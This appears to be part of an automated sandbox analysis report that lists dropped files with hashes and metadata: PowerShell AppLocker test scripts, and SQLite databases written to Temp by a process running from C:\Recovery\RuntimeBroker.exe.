                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgtofitm.fy4.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1sest1h.mt5.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tt0tmm14.jf4.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tykmyem3.dsz.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujqay03e.0bj.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn54t5sx.123.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_widroizw.tdc.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4svrjrw.u0l.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylhhfvyx.p1u.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z3sm1ece.n3o.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhssilii.031.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\a0N2iowTMf

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\aMsmUqfb0C

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\aWWCI1xmPo

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\b6Isf6ZzPO

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\bF0WKenChZ

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\bbxeI3ug9M

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\bhodrUP45v

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\bjJUYl26F2

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\cAxrBTc2GY

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\dFbs0PXLEK

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\dJOwy5kKWH

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\dPqhjTyRx1

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\dTkjNxJvj3

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\de2Br8Li4x

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
